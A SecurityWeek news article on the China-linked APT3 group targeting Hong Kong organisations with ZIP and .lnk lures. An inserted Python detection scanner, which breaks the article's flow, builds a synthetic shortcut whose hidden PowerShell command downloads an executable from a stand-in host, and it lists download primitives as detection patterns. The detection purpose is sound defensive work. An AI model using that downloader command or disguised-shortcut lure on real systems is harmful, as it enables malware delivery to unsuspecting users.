
China-Linked APT3 Group Focuses Attacks on Hong Kong

A China-linked cyberespionage group has shifted its attention from the United States to Hong Kong, where it has targeted more than a dozen organizations over the past year.


FireEye reported last week that APT3, a threat actor believed to be sponsored by China, had targeted two Hong Kong government agencies in early August. The attackers had used spear-phishing emails to trick recipients into installing what the security firm said was a previously unseen piece of malware.

APT3, also known as UPS Team, Gothic Panda, Buckeye and TG-0110, has been active since at least 2009. The group’s attacks often involved zero-day vulnerabilities and flaws that had just been patched.

Many of the group’s earlier attacks focused on the United States, including government organizations. However, Symantec, which tracks the threat actor as Buckeye, noticed last year that the hackers had become increasingly interested in Hong Kong.

Symantec observed roughly 82 APT3 victims since the beginning of 2015, but experts pointed out that the group had cast a wide net and only 17 of these organizations were persistently targeted. The list of victims included 13 organizations in Hong Kong, three in the U.S. and one in the U.K.

While there were periods last year when all three countries were targeted, researchers noticed that from March 2016 onward the U.K. and the U.S. no longer appeared among the group's targets.

In the recent attacks observed by Symantec, aimed mostly at political entities in Hong Kong, APT3 used ZIP archives and Windows shortcut (.lnk) files to deliver a backdoor the security firm calls Pirpi.

The infection method appears to be the same in the attacks observed by FireEye – a ZIP archive contains a shortcut file that downloads malware. However, the early August attacks spotted by FireEye did not leverage Pirpi, which has been around since 2010 and which the company tracks as Backdoor.APT.CookieCutter. Instead, the security firm said they involved a new malware tool.
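The lure described above (a ZIP archive carrying a Windows shortcut whose target is a downloader) is detectable without running anything: a .lnk file stores its target path, working directory and command-line arguments in plain StringData after a fixed 76-byte header, so a scanner can open each archive member, parse those fields and flag shortcuts that launch a scripting host with a URL or download primitive in the arguments. The following is an added example written for this article, not code from FireEye, Symantec or the campaign itself; the watch-lists of binaries and argument patterns are assumptions, and the archive it scans is constructed in the block so it runs offline (the shortcut it builds is a synthetic test artifact, not a real APT3 sample).

```python
import io
import re
import struct
import zipfile

# LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C                      # ShellLinkHeader is always 76 bytes
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Assumed watch-lists (not from the article): hosts that shortcuts abuse to fetch
# and run a payload, and argument fragments typical of a one-line downloader.
SUSPICIOUS_BINARIES = ("powershell", "cmd.exe", "mshta", "rundll32", "regsvr32",
                       "certutil", "bitsadmin", "wscript", "cscript")
SUSPICIOUS_ARGS = re.compile(
    r"https?://|downloadfile|downloadstring|\biex\b|-enc|frombase64string|-w\s*hidden", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link; IDList and LinkInfo are skipped."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad header size or CLSID)")
    pos = HEADER_SIZE

    def need(n):  # bounds check so a truncated file raises instead of mis-parsing
        if pos + n > len(data):
            raise ValueError("truncated shell link")

    if flags & HAS_LINK_TARGET_ID_LIST:
        need(2)
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        need(4)
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    out = {"flags": flags}
    # StringData blocks appear in this fixed order, each only if its flag is set
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        need(2)
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        need(count * width)
        raw = data[pos:pos + count * width]
        pos += count * width
        out[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return out


def lnk_indicators(info: dict, member_name: str) -> list:
    """Reasons a parsed shortcut looks like a downloader lure; empty list means clean."""
    reasons = []
    target = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    if any(b in target.lower() for b in SUSPICIOUS_BINARIES):
        reasons.append("launches a scripting/LOLBin host")
    if SUSPICIOUS_ARGS.search(target):
        reasons.append("arguments contain a URL or download/decode primitive")
    stem = member_name.rsplit("/", 1)[-1][:-4]          # drop ".lnk"
    if "." in stem:                                      # e.g. "report.pdf.lnk"
        reasons.append("double extension disguises the shortcut as a document")
    return reasons


def scan_zip(zip_bytes: bytes) -> dict:
    """Map each .lnk member that trips an indicator (or fails to parse) to its reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".lnk"):
                continue
            try:
                reasons = lnk_indicators(parse_lnk(zf.read(member)), member)
            except ValueError as exc:
                reasons = [f"unparseable shortcut: {exc}"]
            if reasons:
                findings[member] = reasons
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk (synthetic test data, not a captured sample)."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH
             | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # attrs, times, size, icon, SW_SHOWNORMAL
    id_list = struct.pack("<H", 4) + b"\x1f\x00" + b"\x00\x00"  # one ItemID + terminator
    id_list_block = struct.pack("<H", len(id_list)) + id_list
    link_info = struct.pack("<7I", 28, 28, 0, 0, 0, 0, 0)       # header-only LinkInfo

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + id_list_block + link_info + s(relative_path) + s(working_dir) + s(arguments)


def build_sample_zip() -> bytes:
    """Constructed lure archive: decoy document, a disguised downloader shortcut, a benign one."""
    lure = build_lnk(
        "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "C:\\Windows\\System32",
        "-w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/u.exe',"
        "$env:TEMP+'\\u.exe')\"")
    benign = build_lnk("..\\notes.txt", "C:\\Users\\alice", "")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Briefing.docx", b"decoy document bytes")
        zf.writestr("Briefing.pdf.lnk", lure)
        zf.writestr("notes.lnk", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in scan_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(why))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo structures by their declared sizes rather than interpreting them, because the fields an analyst needs for triage (target, working directory, arguments) live in StringData; a production scanner would also cap member sizes before reading and treat an unparseable .lnk as a finding in its own right, which this version already does.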

This suggests that China may have stepped up its attacks just before the Hong Kong legislative elections that took place on September 4. The Chinese government has been increasingly concerned about Hong Kong’s push for more political independence.

In addition to Pirpi, Symantec observed APT3 using various other tools, including keyloggers, remote command execution tools, system information harvesting tools, and browser password stealers. Researchers said the group appears to be focusing on file and print servers, which suggests they are mainly interested in stealing documents.

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
